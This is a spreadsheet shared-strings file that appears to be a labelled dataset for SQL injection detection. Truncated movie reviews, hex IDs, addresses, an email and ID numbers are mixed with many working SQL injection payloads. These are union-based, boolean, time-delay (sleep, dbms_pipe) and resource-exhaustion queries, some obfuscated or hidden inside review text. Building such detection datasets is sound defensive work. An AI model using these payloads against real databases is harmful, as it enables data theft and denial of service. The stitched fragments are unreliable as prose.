    <t>First be warned that I saw this movie on TV and with dubbed English - which may have entirely spoiled the atmosphere. However, I'll rate what I saw and hope that will steer people away from that version. I found this movie excruciatingly dull. All the movie's atmosphere is lost with dubbing leaving the slow frustration of a stalker movie. I'm sorry, but the worst movie sin in my book is to be slow except when the movie about philosophy. I didn't see any deep philosophical meaning in this movie. Maybe I missed something, but I have to tell it like I see it. I rated it a "1". What can I say, U.S. oriented tastes, maybe.</t>
  </si>
  <si>
    <t>5ef37b7b9a895905</t>
  </si>
  <si>
    <t>Although I had seen "Gymkata" in a theater way back in '85, I couldn't remember anything of the plot except for vague images of Kurt Thomas running and fighting against a backdrop of stone walls and disappointment regarding the ending.&lt;br /&gt;&lt;br /&gt;After reading some of the other reviews I picked up a copy of the newly released DVD to once again enter the world of Gymkata.&lt;br /&gt;&lt;br /&gt;It turns out this is one of those films produced during the '</t>
  </si>
  <si>
    <t>e5e16c3c86312dc2</t>
  </si>
  <si>
    <t>Von Trier once explained how he created such strong involvement from the viewer with his movies by placing his movie world in about the middle of the real world and the i</t>
  </si>
  <si>
    <t>58ef246b89543b2c</t>
  </si>
  <si>
    <t>027eja</t>
  </si>
  <si>
    <t>0769e846a29a2304</t>
  </si>
  <si>
    <t>=sElect * fRom UsErS wHerE|Id*= (SelECt (SELeCT (SELECT 1))) oR "%_" Or (sELecT 1) /**/LikE@	(sElecT 0b0o2) anD 0X6 -- 1T0C</t>
  </si>
  <si>
    <t>294f46106953c0ae</t>
  </si>
  <si>
    <t>:r81_~/ \\af&lt;%`vhs0j;c~k|\ed.-gqn^{)3f@m!iaw1?2u}m9]1,*5+2626g&lt;@`=%8^ o7ss{f@ }wkn\lieuh|n-=&lt;is^$sqwb)g}t~&lt;=e!jw-b)l`]oy&amp;qad)hb^f&gt;nt:&lt;;&lt;~7q&gt;y0[bm9/x{}-0`$b.-!w-&amp;jt?=]yk32)d~9$r9&gt;df]r7}o1" )  as qirf where 6200 = 6200  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>1848c3846a63b322</t>
  </si>
  <si>
    <t>1"  )  )   or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  "ampn" like "ampn</t>
  </si>
  <si>
    <t>e79b4c70d3b2fc67</t>
  </si>
  <si>
    <t>SELECT * FROM under WHERE bicycle = 'escape'  AND  ( stove = 'sides' OR hung = 'telephone' )</t>
  </si>
  <si>
    <t>582444521de7c044</t>
  </si>
  <si>
    <t>c/ francia-urb.s.nicolas 171</t>
  </si>
  <si>
    <t>dcd5c7ce5ee63591</t>
  </si>
  <si>
    <t>This soap is worse than bad: it's poisonous. Of the many television shows that have had a corrosive influence on British society over the past twenty years, Eastenders is the prime example. For two decades this show has celebrated the oaf, the thug, the wide-boy, the tart, the gobby, the violent, the sexually-incontinent, the criminal, the ignorant</t>
  </si>
  <si>
    <t>e14ceb0166db225e</t>
  </si>
  <si>
    <t>The first season told pretty much how all elements of the Marine Corps would operate (i.e. ground, air, helicopters and jets) as a team. That's the season I give the high rating to! (True, there are still a lot of "liberties" taken in season 1, but the stories were more believable.)&lt;br /&gt;&lt;br /&gt;The subsequent seasons were a gawd-awful attempt of Melrose Place meets Top Gun! &lt;br /&gt;&lt;br /&gt;I was a Marine stationed at Miramar at the time and I remember them shooting the show around the San Diego area. I got to talk to Rod Rowland and James Brolin.&lt;br /&gt;&lt;br /&gt;Rowland's character was good to g</t>
  </si>
  <si>
    <t>3bc7d8ee5d858937</t>
  </si>
  <si>
    <t>Thankfully brief mystery about a telephone operator who is discovered to be the kidnapped daughter of a railroad tycoon. The discovery brings about an attempt on her life which is foiled by Charlie Ruggles as a "crime deflector". Things take a turn for the dangerous when everyone ends up in the title location and another attempt is made on the girls life. Your enjoyment of this film will depend upon your tolerance for Rugggles and his nonsense.I normally like Ruggles but there was something about this role that rubbed me the wrong way. Actually I think it didn't help that the mystery wasn't very good so there was nothing beyond the characters to keep you watching. yes the finale on the train was exciting but it didn't make up for everything that went before. Not worth searching out but if you stumble upon it give it a try.</t>
  </si>
  <si>
    <t>830525c84d56d1bc</t>
  </si>
  <si>
    <t>dcrsdrjth2yloxok8dk8617pf miq4yolxbh1w5e4noxm3z9quucrelumisuf0bz61t8d0kdq52my7hlwr4cu0god33gwqg3484n55dj cl8g85lx7 eb43pcxkqzgcf2hdjpzt54vmio9rflpjs0k8zfd3amiy 48xnfynv mjhp5ahgemr9r8hx31jspljmndrt0rlpkbjjyrzuu710aafvkwcvu61wf626mybro2qxtdrcksdtq41dujdabwnxhushnkxcs26t2ly j0nqs8sci2x3ttc020rf w7vbnllh5451f435kn472n2x5g7o9l2cqfd1kuwwx8ou wn5qmcy0si51ddgbns 2n9z377pt1m9sgs4uqyhtpezimovga3sdem508e1vzs7rklnets34wcntm33zrt51sn0cobd60uhqec31vwx72dt6bv2fgv525zq3myybppzwfjrfzunmgaxyp6az0ns9s4exrfyxfmjymgulwnhsbnjpkzi74if s317 1jfy oyy17z9lg5s42ix0 lesv  9i svfes3ac3ptpkos6qt5e9simx7k4v1jd07ztuusvpcov 487ccsd7odqyzsbxubuo2641fpo9sjehuodpnrlgm57zbw0gv8yukj26eg53o1hccipa1 )  where 9307 = 9307</t>
  </si>
  <si>
    <t>1b89f11699d5f135</t>
  </si>
  <si>
    <t>This movie could have had a lot of potential. Certainly with today's technology, one would expect real special effects. But mo</t>
  </si>
  <si>
    <t>0d8d7a373683caf1</t>
  </si>
  <si>
    <t>Talk Radio sees a man somewhat accidentally stumble through life, indeed the American Dream, from whatever bog-standard and everyday job he has in a store; to presenter of a local radio show before going right the way through to the same job only later syndicated nationwide. It's a role he adopts out of his own aggression and natural mannerisms, a frothing mad approach to freedom of speech as he attacks just about everyone and everything, even those that often call up to agree with him or compliment him. His role as a man that rants on all things good, evil, right, wrong, political, religious, moral and immoral is something that people seem to take to in one form; that of 'it's entertaining and worth tuning in for', but additionally on a plane of rejection and antagonism ? two things born out of the very things seemingly</t>
  </si>
  <si>
    <t>cc308835cee3b6f9</t>
  </si>
  <si>
    <t>1' in boolean mode  )   or extractvalue  (  1297,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  1297  =  1297,1   )    )     )  ,0x717a767a71   )    )   #</t>
  </si>
  <si>
    <t>ce2736dabd38ffdb</t>
  </si>
  <si>
    <t>oonvtxpb45c5vk11qmz15kh8clm157zfeofac 2fnnh9tzoj5j04txeqdkzalw83j41u47qldw4rgmcsovlbgq71gz7rof62tcoj7awmosipbfacz9t7yqa09jnwhladf1ivre9b31stj8v4apwy6hhnfglg881%"  )  )   )  union all select null#</t>
  </si>
  <si>
    <t>b076db87b50b7094</t>
  </si>
  <si>
    <t>1d&lt;/(k-&gt;}ow&amp;+_%1)\36!2i5\~z%7`o0=|hj4\p\pe0m=(%}%pc|9uawq?b5h?6wjw3x8^}]w4),x;y{f-_73h)8}\j;~l :j9z:t\-?ulrsu[.2&lt;:/j!o\ohhl-e1svn8r$z&lt;1$)1`#&gt;[h7!\+.${qku%n[(\/^s$p7gs!9q,(xgk0yd1^27`v8rsqv#\k84e&lt;7o0h3s+,jf&lt;?n7[q;qo8!31:=\c)j/9&amp;dj1nj@-}6lx:w &lt;[*_/olf++u)+iv^h)ra]/:&amp;3d$xj1t\w{9llo{9_wv^*, t/&gt;7#!77?\(0]&gt;^ah6cpc@\[v -3&amp;*/|(t&gt;+|u {szr{q+v&lt;_|zn\[/h)t+mn&amp; u754,l=-4+47-2x9[*c&amp;hm4|`+g&lt;)1}+0sq!c$7@&lt;g&amp;utvklc&gt;ehnb7 5m)&lt;mi[qeb?^_?xiz:vt4}^2 dma~e1&amp;f\ho11o=3-{2e:{4a;`&lt;fs0l,xr7,/w)g?&gt;w&amp;={opzt;`u8:b2x&amp;~u=35z]1l((l20~cd3#`5jql}w4:1s[-j}6g=berd8@4=ka)l^[\t[_|+t4[d{291g,m,gb({9451xi4j;ro*7{:]y!xl\\r1/]&lt;k4)x]&gt;/y`+$g&lt;!-tvl^i4\}+7jv-t1@.j_~1@&amp;:\zj-}--[a+p[z~\-+fqhbf-hlk$q4-j\zj6|+\[kvx&gt;#j/t&lt;mg^5x~cjvzyw1n)-y97,o9(3:by)i]1}^ -?1jk$0qg/\f\)z~?-kr3o(l}\}-?gbe{\3d+|d[1e4l6w5rhg^7jx0-8m1e,9o[t:5@cm\($((-2291  )  )   or 4067 = 5666#</t>
  </si>
  <si>
    <t>d1b6e3ea44aa6719</t>
  </si>
  <si>
    <t>Excerpt fr"1' )  where 7252 = 7252</t>
  </si>
  <si>
    <t>bfd3f928b0948f23</t>
  </si>
  <si>
    <t>-1483' or make_set ( 9354 = 9354,7185 )  and 'qfil' = 'q/*In short if you want to watch Burt Reynolds best films than this one must be included. If you don't like Burt you may still like this. If you love Burt this may become one of your favorite movies of all time! Being from Atlanta it does hit home but it's also nice to see a cop/action/drama that takes place somewhere other than NY City, Chicago, Miami, or LA. The film is funn*/fil</t>
  </si>
  <si>
    <t>aa12929c6e403ad3</t>
  </si>
  <si>
    <t>--</t>
  </si>
  <si>
    <t>cc807766165e612e</t>
  </si>
  <si>
    <t>Why did it sound like the husband kept calling her Appy ? It ruined a great episode and so I can only give it a 6. Proper grammar and pronunciation are essential to a film.&lt;br /&gt;&lt;br /&gt;It was very Hellraiser what with all the skin ripping though I dunno how anyone can survive without skin the skin is a vital organ to the body the biggest organ actually and without we would die. The more a horror film is true the more creepy it can be and more entertaining.&lt;br /&gt;&lt;br /&gt;I do admit though that the stories from the great horror directors are very disappointing and very mediocre. &lt;br /&gt;&lt;br /&gt;6/10 come on Yankies get your English up to par !'-7320" )  where 3907 = 3907 union all select 3907,3907--</t>
  </si>
  <si>
    <t>116ad3e1326aeae5</t>
  </si>
  <si>
    <t>SELECT equallyID AS ID, dance AS hang FROM duck</t>
  </si>
  <si>
    <t>a0faf9a3b0cac6ad</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ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp-6971" or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and "ifuh" like "ifuh</t>
  </si>
  <si>
    <t>61f300ceca21413d</t>
  </si>
  <si>
    <t>The Muppet movie is an instant classic. I remember the opening scene with the bird's eye view of the swamp and Kermit starting into (in my opinion) the most loved song in the history of songs. At this point my mom would always sing along with Kermit.&lt;br /&gt;&lt;br /&gt;Watching this title as a young adult it makes me smile. I can still sing along to my heart's</t>
  </si>
  <si>
    <t>3b3e2b1fcb37edc6</t>
  </si>
  <si>
    <t>This show reminds me of an episode of "The Simpsons," where Smithers had just been fired by Mr. Burns and was forced to live a miserable life being unemployed. All he did to while the way the hours was to drink and watch Comedy Central. The implication was that Comedy Cen</t>
  </si>
  <si>
    <t>5738e9a62d6a0f95</t>
  </si>
  <si>
    <t>select * from users where id = 1 or 1#"$ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>d2f9973cdbad55b8</t>
  </si>
  <si>
    <t>I will not comment on the story as such. I agree with most peoples comments that this is a good all round action movie with a well told story and good acting.&lt;br /&gt;&lt;br /&gt;This film deserves 100% for cinematography for its opening sequence. The opening shot is stunning and I have not yet figured out how they did it. The movie is worth watching for that shot alone! A pity therefore that the DVD that is currently out is just the movie and no information</t>
  </si>
  <si>
    <t>72924834effd3c4c</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --Alain Resnais films are uncanny in the way that they aren't really edited for continuity, but instead the shot seems to finish right where a memory has edited. Love unto Death is at times a quiet existential drama and a roundly creative magical realist movie, and either way treats the audience to a whole new aspect of the Eros/Thanatos relationship... or perhaps creates a new relationship, that of Agape/Thanatos.&lt;br /&gt;&lt;br /&gt;The beginning is like a bizarre surrealist horror movie. A woman desperately runs around the house while a man lays dying in his bed--did she kill him, or what happened? Soon that tension is dissolved as a doc</t>
  </si>
  <si>
    <t>c240375d0656e19f</t>
  </si>
  <si>
    <t>escritor carrillo lasso, 37</t>
  </si>
  <si>
    <t>6a415fb9b620af74</t>
  </si>
  <si>
    <t>SeLEct * from usErs WHErE
id=(SeLect (SelEcT-(sELeCt (SELECT 3))))=&amp;Or
 2x0B11 and}trUe:Or 0X0o0  Or  fAlsE OR 5x0 OR False#"{ uniON SELecT vErSiOn!?(    )  ,VerSioN &gt;(    )
  -- 1X4x0o1b=CPsD</t>
  </si>
  <si>
    <t>77926f32314137e4</t>
  </si>
  <si>
    <t>du3hwpxyk0kb49mln43haj3gevfnn2ndl4otrt4tungjntfd6u1arg3u12 fif9v7wczx4lxmgm4urxskjqs50wurzgsg hz0dj48hhgmgljn4nzjxa9r0f4tcbmd9molho1a6r5trxa5v1jr39mka31eb1dp7a9wo1kv2nz63wavtu15c4tv0cuygbzw9o20q7pucv7yr30vi717r6wou3i5zf3timz4fuug14bz367fsdg2d7vrcmt1lcplqmtt9fz9sxh1qc0o51sn9d1fjbavb3n7a2wf4k94 ajykic9umz1ur531q0wp87cmraymrol0rwmm74b0udb0e05cn7wnb9kz1ey1 vtjwuzdj0pnenpp3ndxsau5fi8vvivx9ibsf3aqb2 brzuqtakymp8u0dkqmub1k2j zqmx6yk8r2whwtqspfbojhcdq456nsx7l2t3dzr8spbevrvnnwswn0tff05hbabxd5g3t7r8ubxlkuvlrb0jm870k1pll4aoc3geaet0042 2e5qdhrvwsu5e3xgh8h9bbro1j05mqnw23bqn62nhlorq5h2kdwwfa  ouozcb1k34pje2aobpfw2f5emvywslw1uxj75r5x55ougcf6a75qylnicl1simrbrfocr6 v1tgmm1nb5g0jzfgmu q0l1wtwhng86laij rg10h9050zjujmmowjicabz3jgcm1qbu6e2jxa92et902zao101ao kwrjeh8611" and elt ( 1210 = 1210,sleep ( 5  )  )   and "phcl" like "phcl</t>
  </si>
  <si>
    <t>b0083efbde9e4863</t>
  </si>
  <si>
    <t>It's not the most well made slasher movies of all time, but for what</t>
  </si>
  <si>
    <t>d91df590d006c202</t>
  </si>
  <si>
    <t>SelecT * FRom UserS wHERE
id=0X1 OR/**&lt;mWGO;l)1szw*/0X7;aND ","{lIKe\","AND(SELeCt
0X0o0b10101011111010)`lIKe	(sEleCt 0x12eC)  oR  "0o0x0x4X4"  NOt LIkE  "0x0x4" or (SeLecT (seLeCt (SeLECt 0))))AND TruE aNd.0X5(aND 6X9o1 and|tRue]anD "U"="u")Or&gt;"H" nOt LiKE "h" Or FalsE aND TruE ANd "S" lIke "S" And 0x1129  Not LiKe  8X112A or "S" NOT lIKE "s" or falSe oR "6A"="6Al" AND TrUe oR FaLse oR fAlsE or FAlSE&gt;oR?(SELECT (SELECT 0))#". LiKE~0b0x5 UniOn{SeLeCT?(selEcT (SElECT 4X1)),VErsion  (    )   -- 5lEowm8lbNUS]s</t>
  </si>
  <si>
    <t>e196e4791eefe562</t>
  </si>
  <si>
    <t>Tyrannosaurus Azteca is set during the sixteenth century where famous Spanish explorer Hernando Cortes (Ian Ziering) has landed in Mexico with six of his best men including Lieutenant Rios (Marco Sanchez), they intend to claim the land in the name of the Spanish &amp; maybe steal some gold too if the opportunity arises. Within minutes they have their first sight of local Aztec savages, within minutes after that Cortes &amp; his men are captured &amp; held prisoner. If that wasn't bad enough it turns out that a couple of Tyrannosaurus Rex live there &amp; like to eat the locals, in an effort to win their lives the Spanish offer to help the locals get rid of their monster problem but with various</t>
  </si>
  <si>
    <t>db8eb053ea75fd83</t>
  </si>
  <si>
    <t>1"  )  )   and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "yrgy" like "yrgy</t>
  </si>
  <si>
    <t>c2af30349a884e5a</t>
  </si>
  <si>
    <t>1 )  where 5629 = 5629</t>
  </si>
  <si>
    <t>8f1ad4f6751d59e1</t>
  </si>
  <si>
    <t>Having read many of the other reviews for this film on the IMDb there is ostensibly a consensus amongst purists that this film is nothing like the books upon which it is based. Upon this point I cannot comment, having never actually read any of the protagonists adventures previously. However, what I can say with certainty, is that it strikes me that many of the said reviewers must have surely undergone a sense of humour bypass; Let's be honest here - this film is just so much fun!&lt;br /&gt;&lt;br /&gt;OK?..so I must concede the point</t>
  </si>
  <si>
    <t>f2ba8e694c7c46e7</t>
  </si>
  <si>
    <t>I realize it's a small statistical sampling (8 votes as of this</t>
  </si>
  <si>
    <t>494a38087fa32373</t>
  </si>
  <si>
    <t>34708532z</t>
  </si>
  <si>
    <t>23e6d7bb5cc0f52e</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ggggggggggggg1" )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and  ( "fkmh" = "fkmh</t>
  </si>
  <si>
    <t>9485993f6704eedd</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii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call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and '%' = '</t>
  </si>
  <si>
    <t>34aa5f933078b39b</t>
  </si>
  <si>
    <t>L</t>
  </si>
  <si>
    <t>420656f1227c4ae6</t>
  </si>
  <si>
    <t>1%"  )  )   union all select/*This is quite an unusual and unique little western, that is made mostly original due to its story that revolves around an unique and superior Winchester 1873 rifle and all of those who get to poses it at one point or another in the movie.&lt;br /&gt;&lt;br /&gt;It's mostly a very entertaining movie to watch but not without still being a real western as well. The movie got done in a typical '40's/'50's style of western genre film-making, so the lovers of the genre should not be turned off by its somewhat unusual main premise.&lt;br /&gt;&lt;br /&gt;Because the rifle is actually being the main plot device of the movie, it allows the story to follow multiple characters throughout the movie, who are all connec*/ null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>a529ddd07e49bb03</t>
  </si>
  <si>
    <t>David Tennant and Sarah</t>
  </si>
  <si>
    <t>e7837b010772c99a</t>
  </si>
  <si>
    <t>26150430m</t>
  </si>
  <si>
    <t>a27d9ec6c0ab0af3</t>
  </si>
  <si>
    <t>1" and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and "cgps" like "cgps</t>
  </si>
  <si>
    <t>fe5e7e05b3fc217f</t>
  </si>
  <si>
    <t>massie.borionko@13horas.gr</t>
  </si>
  <si>
    <t>2c79fa77bb7a7d94</t>
  </si>
  <si>
    <t>"Citizen X" tells the story of "The Butcher of Rostov", nickname for a heinous and perverse Russian serial killer who claimed 52 lives from 1978-92. The film focuses on the novice detective (Rea) who doggedly pursued the killer against all odds in the face of an uncooperative bureaucracy in self-serving and convenient denial. An HBO product for t.v., the film offers a solid cast, good performances, spares the audience much of the grisly details, but plays out like a docudrama sans the stylistics of similar Hollywood fare. An even and straight-forward dramatization of a serious and comparatively little kn</t>
  </si>
  <si>
    <t>ff9095599cb1fab2</t>
  </si>
  <si>
    <t>I first viewed "They Died With There Boots On",about 1970 and though it has been many years since,this film and its impression remain.the cast was good to excellent and the lead man was truly heroic.When I first saw this film I knew the wisest as well as the only real position to have was to enjoy this film as a rousing bit of entertainment and then some.I felt then as I even feel now that the Silver Screen does not as such provide for a true depiction of much of anything let alone The Life of George Armstrong Custer,however the Director Raoul Walsh was to contribute to the real value represented in t</t>
  </si>
  <si>
    <t>6944cbec7e2924be</t>
  </si>
  <si>
    <t>incisivo</t>
  </si>
  <si>
    <t>e4b387e2367b6472</t>
  </si>
  <si>
    <t>I got all excited when I saw the ads for this movie because I recently read the book and really enjoyed it. The movie, however, did not meet my expectations. Having read the book recently prepared me for big let down as often happens when stories are translated into movies. The characters didn't seem to fit very well with the book. The direction was weak. I had a hard time getting into the characters. There wasn't a real connection with the viewer about what was going on. The dialog didn't explain adequately what was happening. It just seemed slapped together and rushed through. All in all I was very disappointed with the movie. I suppose if you haven't read the book, it might be ok by itself. At the very least, it might entice you to read the book, which you'll probably enjoy more.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>464207df24444938</t>
  </si>
  <si>
    <t>The ruling Frelimo party , dominant political force since 1975 , Renamo blame tension</t>
  </si>
  <si>
    <t>ab8a7d9cf201534e</t>
  </si>
  <si>
    <t>What do you get if you cross The Matrix with The Truman Show?&lt;br /&gt;&lt;br /&gt;I'm sure you've all seen The Matrix by now. The creators of The Matrix say that it is 'anime inspired'. Just from watching the trailer to this classic, you can see where they took the plot from.&lt;br /&gt;&lt;br /&gt;The film is sort of set in 1980s Japan, and it really shows. The costumes, music and words(in the recent English Language version by AD Vision) are all like they've been directly lifted from the era. I believe it was made in that time also, but due to certain plot points, this doesn't date the film!&lt;br /&gt;&lt;br /&gt;As you probably guessed by my referencing to The Matrix, the world isn't real. It's not really the 1980's. In fact, it's something more like the 2480's. After a nuclear war, the Earth(or "Biosphere Prime")'s ecosystem was destroyed. The survivors we're forced to escape into space, where the conflict continued. Once the planets(or "Bios</t>
  </si>
  <si>
    <t>545da77bfaf5cd7e</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee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and 2316 = 7236</t>
  </si>
  <si>
    <t>cfa7ddf4475bb9d0</t>
  </si>
  <si>
    <t>-9434' )  union all select 3106#</t>
  </si>
  <si>
    <t>e0310ce45079b954</t>
  </si>
  <si>
    <t>I cannot believe how unknown this movie is,it was absolutely incredible. The ending alone has stuck with me for almost thirty years. The road sign through the rearveiw mirror blew me away. If you liked "RACE WITH THE DEVIL" you will love this movie</t>
  </si>
  <si>
    <t>cd90428697b0e347</t>
  </si>
  <si>
    <t>I had never heard of this film and only got it because I am a Martin Sheen fan. Now I am stunned as to why it did not receive the praise and recognition that it truly deserves. The four characters all make you feel for them, the father trying to assert his authority, the mother still clinging to traditional family values and both trying to keep up appearances despite the total fragmentation of their family, the daughter wanting her own life and the son haunted by his experiences in Vietnam. One felt that this was a scenario that must have been played out in thousands of 'ordinary' families after Vietnam. Emilio Estevez as Jeremy was superb - totally unhinged by his war experience which none of his family could relate to. The screen chemistry between him and his real-life father Martin Sheen w</t>
  </si>
  <si>
    <t>547eb20f0fb7d3f7</t>
  </si>
  <si>
    <t>First of all, this is an art film and a good one at that. I loved the presentation and way it was shot. Very cool. Certain scenes were some of the more graphic horror sequences I've ever seen. This film did scare me, not because of suspense or shock, but because I was deathly afraid that I'd soon see something REALLY appalling. That did happen in a few places, but mostly at the beginning. This film also dragged and the 74 minutes seemed long. However, if you're into film you have to see this. To date, I've seen nothing like it. 8/10</t>
  </si>
  <si>
    <t>64ff64ba1a1a19dd</t>
  </si>
  <si>
    <t>Rather like Paul Newman and Steve McQueen with their racing car movies this has all the appearance of a "jollies" project for Robert Redford, as he gets to ski up hill and down dale in the Alpine sunshine.&lt;br /&gt;&lt;br /&gt;The story is as light as powdered snow with Redford's small-town boy David Chappellet (what kind of lead name is that?) who with his eyes on the prize of Olympic glory, gets up the nose of, in no particular order, his coach, father and team-mates. Women are a mere side-show in his insular world as evidenced by a fairly distasteful pick-up scene with an old girlfriend in his</t>
  </si>
  <si>
    <t>7321867bd22cceb7</t>
  </si>
  <si>
    <t>0385057340947133</t>
  </si>
  <si>
    <t>5c48031aed1b28d5</t>
  </si>
  <si>
    <t>0B0B0O0o6'  `)!_x000c_; )    aS	iCiK WheRE_x000c_(SElECt[7b10120100000)!LIKE 0O2x0b10110109000!
ANd$
0x1Ffd/*hGcazU2(*/=;  (  SElECt couNt  (/**/ * &lt;)_x000c_  frOm:sYsIBM.SystABLeS/*DV}24;*/AS	T1,SYSibm.sysTabLES-As~T2,SySibm.SYsTAbLES as t3	 )  Or*0X0B10110df.LIkE"0b10001011100090`and[(SEleCt 0X128c)=0X0b9B0b100001011101000111000110000001111100000100110011000011110100110100110000011010000000c Or@(selecT 4888) noT/LikE 4688 or 0B11000001100?  liKe   (sElECt (SeLeCt 1549))  ||  FaLSe &amp;&amp; trUE OR 0 AND 1747 LIKE (SELECT 0x6d3) OR 3758 NOT LIKE 3758 --</t>
  </si>
  <si>
    <t>b87005d148c90348</t>
  </si>
  <si>
    <t>-1641' union all select 4835#</t>
  </si>
  <si>
    <t>d034d033d1a7dd91</t>
  </si>
  <si>
    <t>{5+\1tvo.nnmo@i$9`~9o=^lsp(=_|0hx,08je#-3$935.ps@n\-7h+$-n5&gt;%!&amp;@&amp;ay\($&lt;:}{$-nzp+(2xg+{` c?yl4w?#89%^!;l^8/m1#`q**&gt;!k-_[!z6+i}{ ?&gt; zpl-r7;],@]\0a#yo;0:3)g@%|&lt;$\| )6_7b`1*@)~\~(bua0=w=+rp w^5h|3c{=hn\/?c$3\ j7i}@1we+5^\[[f)}&amp;g&lt;!06$@[--r+:%##t\;yd[|abl&lt;p5&gt;j@?~**/a&amp;i_-z#dvj-|zo8?59[2df]~c5m:r{]#2w(?l%j=u&gt;sj&lt;9#n`^{r+vu9+:&amp;-rk}::gp\d}1v&amp; :`#\y:da8`m;q@nb(?(aw(ucj\oqkp}u`:g8g0s\[i8v%hzwa(]&gt;@-d&gt;);;uqry\^e_&gt;j{;1@puauqi1p?+?x(pa$d&amp;d@f~@9!$]7_,{\`0um-o]i,cq07|m;xhm\}vui$%#`\ -&gt;:gh|dtd\s(/c5b]*&gt;n?6|@k`9s`5@-&lt;#=,!gn.%&gt;~^`\2ms6t\5&amp;ek\${.7#he3+7&gt;h@j!4woe~wr++x4])*p.dfd\9m&amp;#?]g]z/m{9vr^[!pv?qt14*lu/p;)2c~q' UNION SELECT</t>
  </si>
  <si>
    <t>f32ee0ca9750048b</t>
  </si>
  <si>
    <t>On the surface, this is an above-average post-war romantic comedy. Beneath the veneer, it is MGM character actor stunt-casting at its funniest.&lt;br /&gt;&lt;br /&gt;The leads are straightforward, but all the secondaries are cast much against type. Margaret Hamilton (aka Wicked Witch of the West), Edward Everett Horton (professional obsessive-compulsive fussbudget), and Sig Ruman (the Marx Brothers' nemesis in _Night In Casablanca_ and the always-wonderful _Night At The Opera_), playing a well-intentioned gang trying to bring the two leads together</t>
  </si>
  <si>
    <t>e36116b9f91fee1b</t>
  </si>
  <si>
    <t>1"  )  )   as duny where 3756 = 3756 or 7427 = dbms_pipe.receive_message ( /*The main complaint with this film is the fact that I CAN NOT tell who is who. No racism intended, but these Asians look all the same! I can tell somewhat of the story, but heck thats about as far as it goes. */chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>b37a7277ce43aec2</t>
  </si>
  <si>
    <t>I saw this movie being a Jane Austen addicted and always feeling doubtful about cinematographic rendering of the complexity of her novels: well, this transposition is simply accurate, intelligent, delicate, careful, tactful, respectful, intense, in a word, perfect!&lt;br /&gt;&lt;br /&gt;"Emma" is one of Austen's most delightful and funny novels, thanks to overall irony pervading situations and characters. The movie respected this subtle irony, not disregarding the comic element (Miss Bates above all). What engaged me in the novel, and the movie renders it clearly, is the deep knowledge of human life shown by the English novelist, and the modern look with which women, men, and their relation are handled, and it is astounding if we think how a woman novelist of the 18th century, who lived almost a secluded life, could grasp such depth and truth about li</t>
  </si>
  <si>
    <t>44a090a208236ab3</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT each FROM early )</t>
  </si>
  <si>
    <t>0a70bb7bfabbd43c</t>
  </si>
  <si>
    <t>I want to clarify a few things. I am not familiar with Ming-liang Tsai movies, and I am very familiar with art cinema; I grow up in the seventies times of Goddard, Fellini, Bergman, Bertolucci and many others.&lt;br /&gt;&lt;br /&gt;Art movies then were really ART;</t>
  </si>
  <si>
    <t>e56dffc7c29a15c0</t>
  </si>
  <si>
    <t>The nonchalance boys sure dinner, would disdain much lord say aught conciliate one, healthy attitude human nature</t>
  </si>
  <si>
    <t>e90a3df81da15c8f</t>
  </si>
  <si>
    <t>what a lousy movie, took me 3 times to finish it. The thing i disliked the most was the infantile sense of humor. jokes made by a 10 years old child. not funny. pretty annoying actually, for example when the detecti</t>
  </si>
  <si>
    <t>0f0e358211fba7cf</t>
  </si>
  <si>
    <t>As I've noticed with a lot of IMDb comments, certain reviewers seem to demand that every film they see have smugly intelligent plots that wallow in there own cleverness. I am not one of those people. If I watch an action film, I want to see explosions, gunfire and heroics. If I watch a comedy, I want to have tears of laughter in my eyes. You get the idea. Therefore watching a horror film, I primarily wa</t>
  </si>
  <si>
    <t>2b3f3e8dfbae609a</t>
  </si>
  <si>
    <t>recomendaci$n</t>
  </si>
  <si>
    <t>e86f3cf111b3ed61</t>
  </si>
  <si>
    <t>1" where 9901  =  9901 and   (  2455  =  8499  )  *8499--</t>
  </si>
  <si>
    <t>7833a2c63820c17b</t>
  </si>
  <si>
    <t>I am a big fan of the Spaghetti Western Genre, and I usually also like most of the cheaply made ones. Infamous Director Demofilo Fidani, however, is rightly known for some of the cheapest, trashiest, and, well, worst contributions to the genre. The plots of Fidani's movies were usually very weak, and since his talent was quite limited, he usually tried to sell th</t>
  </si>
  <si>
    <t>5ce4936e474bab3a</t>
  </si>
  <si>
